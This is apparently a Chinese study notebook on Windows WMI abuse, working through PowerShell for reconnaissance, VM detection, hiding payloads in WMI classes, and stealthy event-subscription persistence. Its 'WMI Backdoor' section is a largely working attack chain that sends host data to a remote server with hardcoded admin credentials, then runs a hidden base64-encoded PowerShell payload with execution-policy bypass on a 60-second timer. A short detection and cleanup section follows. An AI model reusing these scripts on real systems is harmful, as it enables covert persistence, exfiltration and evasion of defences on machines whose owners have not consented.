Windows-WMI分析及运用(一)

关键词: Windows, 持久化, 漏洞 状态: 进行中

参考链接:

WMI Attacks

https://wooyun.x10sec.org/static/drops/tips-8189.html【本文由三好学生原创并首发于乌云drops】

WMI Backdoor

https://wooyun.x10sec.org/static/drops/tips-8260.html【本文由三好学生原创并首发于乌云drops】

WMI Defense

https://wooyun.js.org/drops/WMI Defense.html【本文由三好学生原创,原文地址:http://drops.wooyun.org/tips/8290

WMI 相关内容

https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe

WSC、JSRAT and WMI Backdoor

https://wooyun.x10sec.org/static/drops/tips-15575.html

0x00 前言

阅读千遍,不如实践一遍。本文是对三好学生原创文章WMI系列的学习及实践测试记录,仅供学习记录使用。原文链接如上。

0x01 Powershell实现WMI attacks

运行环境

  • 目前环境Windows10 至少要求PowerShellV3

相关命令-信息收集

操作系统相关信息

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
SystemDirectory : C:\Windows\system32
Organization    :
RegisteredUser  : Windows 用户

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Domain              : WORKGROUP
Manufacturer        : VMware, Inc.
Name                : DESKTOP-78M3Q0H
PrimaryOwnerName    : Windows 用户
TotalPhysicalMemory : 8588869632

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
Version           : INTEL  - 6040000

文件/目录列表

Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile

磁盘卷列表

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume

PS C:\Users\admin> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume|findstr "Caption"
Caption                      : C:\
Caption                      : E:\
Caption                      : \\?\Volume{6e506627-7001-4ecc-a1fb-bf533c7cae23}\
Caption                      : G:\

注册表操作(未测试)

Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

当前进程

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process

列举服务

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service

日志

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent

登陆账户

PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser

__GENUS          : 2
__CLASS          : Win32_LoggedOnUser
__SUPERCLASS     : CIM_Dependency
__DYNASTY        : CIM_Dependency
__RELPATH        : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
__PROPERTY_COUNT : 2
__DERIVATION     : {CIM_Dependency}
__SERVER         : DESKTOP-78M3Q0H
__NAMESPACE      : ROOT\CIMV2
__PATH           : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183715\""
Antecedent       : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent        : \\.\root\cimv2:Win32_LogonSession.LogonId="183715"
PSComputerName   : DESKTOP-78M3Q0H

__GENUS          : 2
__CLASS          : Win32_LoggedOnUser
__SUPERCLASS     : CIM_Dependency
__DYNASTY        : CIM_Dependency
__RELPATH        : Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
__PROPERTY_COUNT : 2
__DERIVATION     : {CIM_Dependency}
__SERVER         : DESKTOP-78M3Q0H
__NAMESPACE      : ROOT\CIMV2
__PATH           : \\DESKTOP-78M3Q0H\ROOT\CIMV2:Win32_LoggedOnUser.Antecedent="\\\\.\\root\\cimv2:Win32_Account.Domain=\"DESKTOP-78M3Q0H\",Name=\"admin\"",Dependent="\\\\.\\root\\cimv2:Win32_LogonSession.LogonId=\"183625\""
Antecedent       : \\.\root\cimv2:Win32_Account.Domain="DESKTOP-78M3Q0H",Name="admin"
Dependent        : \\.\root\cimv2:Win32_LogonSession.LogonId="183625"
PSComputerName   : DESKTOP-78M3Q0H

共享

Name   Path       Description
----   ----       -----------
ADMIN$ C:\Windows 远程管理
C$     C:\        默认共享
E$     E:\        默认共享
IPC$              远程 IPC

补丁

PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering

Source        Description      HotFixID      InstalledBy          InstalledOn
------        -----------      --------      -----------          -----------
DESKTOP-78... Security Update  KB4570334                          2020/9/27 0:00:00
DESKTOP-78... Security Update  KB4577266                          2020/9/27 0:00:00

杀毒软件

PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run>  Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

__GENUS                  : 2
__CLASS                  : AntiVirusProduct
__SUPERCLASS             :
__DYNASTY                : AntiVirusProduct
__RELPATH                : AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
__PROPERTY_COUNT         : 6
__DERIVATION             : {}
__SERVER                 : DESKTOP-78M3Q0H
__NAMESPACE              : ROOT\SecurityCenter2
__PATH                   : \\DESKTOP-78M3Q0H\ROOT\SecurityCenter2:AntiVirusProduct.instanceGuid="{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}"
displayName              : Windows Defender
instanceGuid             : {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
pathToSignedProductExe   : windowsdefender://
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
productState             : 397568
timestamp                : Fri, 25 Jun 2020 01:35:57 GMT
PSComputerName           : DESKTOP-78M3Q0H

相关运用-虚拟机检测

判断物理内存和逻辑内存,似乎不准!

$VMDetected = $False
$Arguments = @{Class = 'Win32_ComputerSystem';Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'}
if (Get-WmiObject @Arguments) { $VMDetected = $True;"In vm"} else{"Not in vm"}

判断虚拟机进程

$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True ;"in vm"} else{"not in vm"}

相关运用-存储payload【管理员权限】

存储

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()

Path          : \\DESKTOP-78M3Q0H\ROOT\cimv2:Win32_EvilClass
RelativePath  : Win32_EvilClass
Server        : DESKTOP-78M3Q0H
NamespacePath : ROOT\cimv2
ClassName     : Win32_EvilClass
IsClass       : True
IsInstance    : False
IsSingleton   : False

读取

PS C:\Windows\system32> ([WmiClass] 'Win32_EvilClass').Properties['EvilProperty']

Name       : EvilProperty
Value      : This is payload
Type       : String
IsLocal    : True
IsArray    : False
Origin     : Win32_EvilClass
Qualifiers : {CIMTYPE}

相关运用-隐蔽定时启动程序【管理员权限】

一行

$filterName = 'BotFilter82';$consumerName = 'BotConsumer23';$exePath = 'C:\Windows\System32\notepad.exe';$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query}-ErrorAction Stop;$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath};Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

多行

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query}-ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

结果

__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"",Filter="
                          __EventFilter.Name=\"BotFilter82\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : DESKTOP-78M3Q0H
__NAMESPACE             : ROOT\subscription
__PATH                  : \\DESKTOP-78M3Q0H\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsu
                          mer.Name=\"BotConsumer23\"",Filter="__EventFilter.Name=\"BotFilter82\""
Consumer                : CommandLineEventConsumer.Name="BotConsumer23"
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : __EventFilter.Name="BotFilter82"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : DESKTOP-78M3Q

相关运用-WMI后门检测及清除【管理员权限】

  • 查看当前WMI Event
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
  • 清除后门
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
  • 其他检测方法
 vbs
 mof
 C/C++ via IWbem* COM API
 .NET System.Management classes
查看日志
 Microsoft-Windows-WinRM/Operational
 Microsoft-Windows-WMI-Activity/Operational
 Microsoft-Windows-DistributedCOM

0x02 进阶WMI技巧—WMI Backdoor

  • 测试环境
server监听用服务端
172.16.1.201
win2012x64
username:administrator
password:1qaz!QAZ

client受控端
172.16.1.211
win10x64
  • 步骤一:Client获取主机配置信息-连接远程服务器-保存在远程服务器(客户端执行)
#连接172.16.1.201
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
#新建类名
$EvilClass['__CLASS'] = 'Win32_UserInfo'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
#获取主机配置信息
$GetOS=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem 
$GetProcess=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
$GetService=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service -Filter "State='Running'"
$GetUser=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$GetAV=Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
#注:Powershell中换行符为`n
$EvilClass.Properties['IP172161211'].Value =$GetUser.UserName+"`n"+"OS:"+$GetOS.Caption+";"+$GetOS.OSArchitecture+"`n"+"AntiVirusProduct:"+ $GetAV.displayName+"`n"+"Process:"+"`n"+$GetProcess.Name+"`n"+"Service Start:"+"`n"+$GetService.Name
#存储
$EvilClass.Put()
  • 步骤一:结果(客户端执行)
Path          : \\172.16.1.201\root\cimv2:Win32_UserInfo
RelativePath  : Win32_UserInfo
Server        : 172.16.1.201
NamespacePath : root\cimv2
ClassName     : Win32_UserInfo
IsClass       : True
IsInstance    : False
IsSingleton   : False
  • 步骤二:查询(服务端执行)
([WmiClass]'Win32_UserInfo').Properties['IP172161211']
PS C:\Users\admin> ([WmiClass]'Win32_UserInfo').Properties['IP172161211']

Name       : IP172161211
Value      : MAKAPAKA\Dev1
             OS:Microsoft Windows 10 专业版;64 位
             AntiVirusProduct:Windows Defender
             Process:
             System Idle Process System Registry smss.exe csrss.exe csrss.exe wininit.exe winlogon.exe services.exe lsa
             ss.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe
              svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression sv
             chost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe vmtoolsd.exe vm3dservice.exe VGAuthS
             ervice.exe MsMpEng.exe vm3dservice.exe svchost.exe dllhost.exe WmiPrvSE.exe msdtc.exe NisSrv.exe MoUsoCore
             Worker.exe svchost.exe dasHost.exe svchost.exe sihost.exe svchost.exe taskhostw.exe ctfmon.exe explorer.ex
             e ChsIME.exe svchost.exe SearchIndexer.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe Run
             timeBroker.exe TextInputHost.exe RuntimeBroker.exe dllhost.exe SecurityHealthSystray.exe SecurityHealthSer
             vice.exe vmtoolsd.exe cmd.exe conhost.exe MusNotifyIcon.exe OneDrive.exe SgrmBroker.exe uhssvc.exe svchost
             .exe ApplicationFrameHost.exe svchost.exe powershell.exe powershell.exe conhost.exe svchost.exe Microsoft.
             Photos.exe RuntimeBroker.exe WmiPrvSE.exe svchost.exe RuntimeBroker.exe smartscreen.exe ChsIME.exe audiodg
             .exe
             Service Start:
             Appinfo AppXSvc AudioEndpointBuilder Audiosrv BFE BrokerInfrastructure BTAGService BthAvctpSvc bthserv CDP
             Svc COMSysApp CoreMessagingRegistrar CryptSvc DcomLaunch DeviceAssociationService Dhcp DiagTrack DispBroke
             rDesktopSvc Dnscache DoSvc DPS DsSvc DusmSvc EventLog EventSystem fdPHost FDResPub FontCache InstallServic
             e iphlpsvc KeyIso LanmanServer LanmanWorkstation LicenseManager lmhosts LSM mpssvc MSDTC NcbService Netlog
             on netprofm NlaSvc nsi PcaSvc PlugPlay Power ProfSvc RasMan RmSvc RpcEptMapper RpcSs SamSs Schedule Securi
             tyHealthService SEMgrSvc SENS SgrmBroker ShellHWDetection SmsRouter Spooler SSDPSRV SstpSvc StateRepositor
             y StorSvc SysMain SystemEventsBroker TabletInputService Themes TimeBrokerSvc TokenBroker TrkWks uhssvc Use
             rManager UsoSvc VaultSvc VGAuthService vm3dservice VMTools W32Time WaaSMedicSvc Wcmsvc WdiServiceHost WdiS
             ystemHost WdNisSvc WinDefend WinHttpAutoProxySvc Winmgmt WpnService wscsvc WSearch wuauserv cbdhsvc_c66fa
             CDPUserSvc_c66fa OneSyncSvc_c66fa PimIndexMaintenanceSvc_c66fa UnistoreSvc_c66fa UserDataSvc_c66fa WpnUser
             Service_c66fa
Type       : String
IsLocal    : True
IsArray    : False
Origin     : Win32_UserInfo
Qualifiers : {CIMTYPE}
  • 步骤三:Client端获取指令并执行
Client加密存储指令
Client读取指令-解密-执行

客户端代码

  1. Client加密存储指令 (需要提升权限)

    #定义Payload,为保证变量能够解析,需要使用单引号‘
    $Payload=@'
    $Options = New-Object Management.ConnectionOptions
    $Options.Username = 'makapaka.garden\administrator'
    $Options.Password = '1qaz!QAZ'
    $Options.EnablePrivileges = $True
    $Connection = New-Object Management.ManagementScope
    $Connection.Path = '\\172.16.1.201\root\cimv2'
    $Connection.Options = $Options
    $Connection.Connect()
    $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
    $EvilClass['__CLASS'] = 'Win32_CommandTest'
    $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
    $EvilClass.Properties['IP172161211'].Value ="Run Command Test!" 
    $EvilClass.Put() 
    '@
    #对payload作base64加密
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Payload);
    $EncodedPayload = [System.Convert]::ToBase64String($bytes); 
    #存储加密后的payload
    $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
    $StaticClass.Name = 'Win32_Command'
    $StaticClass.Put()
    $StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
    $StaticClass.Put()
    

    Tip:

    Base64转换

    $a = ipconfig /all
    [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($a))
    [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($b))
    

    Client加密存储指令,命令执行 (需要提升权限)

    #定义Payload,为保证变量能够解析,需要使用单引号‘
    $Payload=@'
    $Options = New-Object Management.ConnectionOptions
    $Options.Username = 'makapaka.garden\administrator'
    $Options.Password = '1qaz!QAZ'
    $Options.EnablePrivileges = $True
    $Connection = New-Object Management.ManagementScope
    $Connection.Path = '\\172.16.1.201\root\cimv2'
    $Connection.Options = $Options
    $Connection.Connect()
    $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
    $EvilClass['__CLASS'] = 'Win32_CommandTest'
    $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
    $command = ipconfig /all
    $EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command)) 
    $EvilClass.Put() 
    '@
    #对payload作base64加密
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Payload);
    $EncodedPayload = [System.Convert]::ToBase64String($bytes); 
    #存储加密后的payload
    $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
    $StaticClass.Name = 'Win32_Command'
    $StaticClass.Put()
    $StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
    $StaticClass.Put()
    

    Base64命令执行使用

    $command = ipconfig /all
    $EvilClass.Properties['IP172161211'].Value =[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($command))
    

    Base64服务端解密

    $result=([WmiClass] 'Win32_CommandTest').Properties['IP172161211'].Value
    [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result))
    

    结果

    PS C:\Users\admin> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($result))
     Windows IP 配置     主机名  . . . . . . . . . . . . . : DevC1    主 DNS 后缀 . . . . . . . . . . . : makapaka.garden
      节点类型  . . . . . . . . . . . . : 混合    IP 路由已启用 . . . . . . . . . . : 否    WINS 代理已启用 . . . . . . . .
     . : 否    DNS 后缀搜索列表  . . . . . . . . : makapaka.garden                                        localdomain  以太
    网适配器 Ethernet0:     连接特定的 DNS 后缀 . . . . . . . : localdomain    描述. . . . . . . . . . . . . . . : Intel(R)
     82574L Gigabit Network Connection    物理地址. . . . . . . . . . . . . : 00-0C-29-6B-36-09    DHCP 已启用 . . . . . .
    . . . . . : 是    自动配置已启用. . . . . . . . . . : 是    本地链接 IPv6 地址. . . . . . . . : fe80::95a8:a9a1:1c42:66
    bb%9(首选)     IPv4 地址 . . . . . . . . . . . . : 192.168.235.135(首选)     子网掩码  . . . . . . . . . . . . : 255.25
    5.255.0    获得租约的时间  . . . . . . . . . : 2020年6月28日 9:28:06    租约过期的时间  . . . . . . . . . : 2020年6月28
    日 11:43:06    默认网关. . . . . . . . . . . . . : 192.168.235.2    DHCP 服务器 . . . . . . . . . . . : 192.168.235.254
        DHCPv6 IAID . . . . . . . . . . . : 100666409    DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-
    29-6B-36-09    DNS 服务器  . . . . . . . . . . . : 192.168.235.2    主 WINS 服务器  . . . . . . . . . : 192.168.235.2
      TCPIP 上的 NetBIOS  . . . . . . . : 已启用  以太网适配器 Ethernet1:     连接特定的 DNS 后缀 . . . . . . . :     描述.
     . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2    物理地址. . . . . . . . . . . . . : 00-
    0C-29-6B-36-13    DHCP 已启用 . . . . . . . . . . . : 否    自动配置已启用. . . . . . . . . . : 是    本地链接 IPv6 地
    址. . . . . . . . : fe80::3419:de22:d5d:d52d%13(首选)     IPv4 地址 . . . . . . . . . . . . : 172.16.1.211(首选)     子
    网掩码  . . . . . . . . . . . . : 255.255.255.0    默认网关. . . . . . . . . . . . . : 172.16.1.201    DHCPv6 IAID . .
    . . . . . . . . . : 419433513    DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-28-4E-4E-9C-00-0C-29-6B-36-09    DNS
    服务器  . . . . . . . . . . . : 172.16.1.201    TCPIP 上的 NetBIOS  . . . . . . . : 已启用  以太网适配器 蓝牙网络连接:
        媒体状态  . . . . . . . . . . . . : 媒体已断开连接    连接特定的 DNS 后缀 . . . . . . . :     描述. . . . . . . . .
     . . . . . . : Bluetooth Device (Personal Area Network)    物理地址. . . . . . . . . . . . . : A8-7E-EA-E9-D7-06    DHC
    P 已启用 . . . . . . . . . . . : 是    自动配置已启用. . . . . . . . . . : 
    

    结果

    PS C:\Windows\system32> $StaticClass.Put()
    
    Path          : \\DEVC1\ROOT\cimv2:Win32_Command
    RelativePath  : Win32_Command
    Server        : DEVC1
    NamespacePath : ROOT\cimv2
    ClassName     : Win32_Command
    IsClass       : True
    IsInstance    : False
    IsSingleton   : False
    
  2. Client查看加密的payload

    ([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
    

    结果

    PS C:\Windows\system32> ([WmiClass] 'Win32_Command').Properties['EnCommand']
    
    Name       : EnCommand
    Value      : JABPAHAAdABpAG8AbgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQwBvAG4AbgBlAGMAdA
                 BpAG8AbgBPAHAAdABpAG8AbgBzAAoAJABPAHAAdABpAG8AbgBzAC4AVQBzAGUAcgBuAGEAbQBlACAAPQAgACcAbQBhAGsAYQBwAGEAawBh
                 AC4AZwBhAHIAZABlAG4AXABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcACgAkAE8AcAB0AGkAbwBuAHMALgBQAGEAcwBzAHcAbwByAG
                 QAIAA9ACAAJwAxAHEAYQB6ACEAUQBBAFoAJwAKACQATwBwAHQAaQBvAG4AcwAuAEUAbgBhAGIAbABlAFAAcgBpAHYAaQBsAGUAZwBlAHMA
                 IAA9ACAAJABUAHIAdQBlAAoAJABDAG8AbgBuAGUAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQ
                 BtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABTAGMAbwBwAGUACgAkAEMAbwBuAG4AZQBjAHQAaQBvAG4ALgBQAGEAdABoACAAPQAg
                 ACcAXABcADEANwAyAC4AMQA2AC4AMQAuADIAMAAxAFwAcgBvAG8AdABcAGMAaQBtAHYAMgAnAAoAJABDAG8AbgBuAGUAYwB0AGkAbwBuAC
                 4ATwBwAHQAaQBvAG4AcwAgAD0AIAAkAE8AcAB0AGkAbwBuAHMACgAkAEMAbwBuAG4AZQBjAHQAaQBvAG4ALgBDAG8AbgBuAGUAYwB0ACgA
                 KQAKACQARQB2AGkAbABDAGwAYQBzAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbg
                 BhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACQAQwBvAG4AbgBlAGMAdABpAG8AbgAsACAAWwBTAHQAcgBpAG4AZwBdADoAOgBFAG0AcAB0
                 AHkALAAgACQAbgB1AGwAbAApAAoAJABFAHYAaQBsAEMAbABhAHMAcwBbACcAXwBfAEMATABBAFMAUwAnAF0AIAA9ACAAJwBXAGkAbgAzAD
                 IAXwBDAG8AbQBtAGEAbgBkAFQAZQBzAHQAJwAKACQARQB2AGkAbABDAGwAYQBzAHMALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AQQBkAGQA
                 KAAnAEkAUAAxADcAMgAxADYAMQAyADEAMQAnACwAIABbAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBDAGkAbQBUAHkAcABlAF0AOgA6AFMAdA
                 ByAGkAbgBnACwAIAAkAEYAYQBsAHMAZQApAAoAJABFAHYAaQBsAEMAbABhAHMAcwAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEkAUAAx
                 ADcAMgAxADYAMQAyADEAMQAnAF0ALgBWAGEAbAB1AGUAIAA9ACIAUgB1AG4AIABDAG8AbQBtAGEAbgBkACAAVABlAHMAdAAhACIAIAAKAC
                 QARQB2AGkAbABDAGwAYQBzAHMALgBQAHUAdAAoACkAIAA=
    Type       : String
    IsLocal    : True
    IsArray    : False
    Origin     : Win32_Command
    Qualifiers : {CIMTYPE}
    
  3. Client读取指令-解密-执行

    #读取加密payload
    $EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
    #PowerShell执行命令
    $PowerShellPayload = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload"
    Invoke-WmiMethod  -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload
    #显示解密指令
    $bytes2  = [System.Convert]::FromBase64String($EncodedPayload);
    $decoded = [System.Text.Encoding]::Unicode.GetString($bytes2); 
    "decoded Payload:"
    $decoded
    
    PS C:\Windows\system32> $decoded
    $Options = New-Object Management.ConnectionOptions
    $Options.Username = 'makapaka.garden\administrator'
    $Options.Password = '1qaz!QAZ'
    $Options.EnablePrivileges = $True
    $Connection = New-Object Management.ManagementScope
    $Connection.Path = '\\172.16.1.201\root\cimv2'
    $Connection.Options = $Options
    $Connection.Connect()
    $EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
    $EvilClass['__CLASS'] = 'Win32_CommandTest'
    $EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
    $EvilClass.Properties['IP172161211'].Value ="Run Command Test!"
    $EvilClass.Put()
    
  4. Server端执行查看结果

    ([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
    
    PS C:\Users\admin> ([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
    
    Name       : IP172161211
    Value      : Run Command Test!
    Type       : String
    IsLocal    : Trueserver端执行
    IsArray    : False
    Origin     : Win32_CommandTest
    Qualifiers : {CIMTYPE}
    
  5. Client定时执行powershell命令

    #读取加密指令
    $EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
    $filterName = 'BotFilter56'
    $consumerName = 'BotConsumer56'
    #创建一个__EventFilter,用于设定触发条件,每隔60s执行一次
    $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
    
    #创建一个CommandLineEventConsumer,用于设定执行的操作
    $Arg =@{
            Name=$consumerName
                CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe  -NonInteractive  -enc $EncodedPayload"
    }
    
    $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
    #用于绑定filter和consumer
    Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
    
    PS C:\Windows\system32> Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
    
    __GENUS                 : 2
    __CLASS                 : __FilterToConsumerBinding
    __SUPERCLASS            : __IndicationRelated
    __DYNASTY               : __SystemClass
    __RELPATH               : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer56\"",Filter="
                              __EventFilter.Name=\"BotFilter56\""
    __PROPERTY_COUNT        : 7
    __DERIVATION            : {__IndicationRelated, __SystemClass}
    __SERVER                : DEVC1
    __NAMESPACE             : ROOT\subscription
    __PATH                  : \\DEVC1\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\
                              "BotConsumer56\"",Filter="__EventFilter.Name=\"BotFilter56\""
    Consumer                : CommandLineEventConsumer.Name="BotConsumer56"
    CreatorSID              : {1, 5, 0, 0...}
    DeliverSynchronously    : False
    DeliveryQoS             :
    Filter                  : __EventFilter.Name="BotFilter56"
    MaintainSecurityContext : False
    SlowDownProviders       : False
    PSComputerName          : DEVC1
    

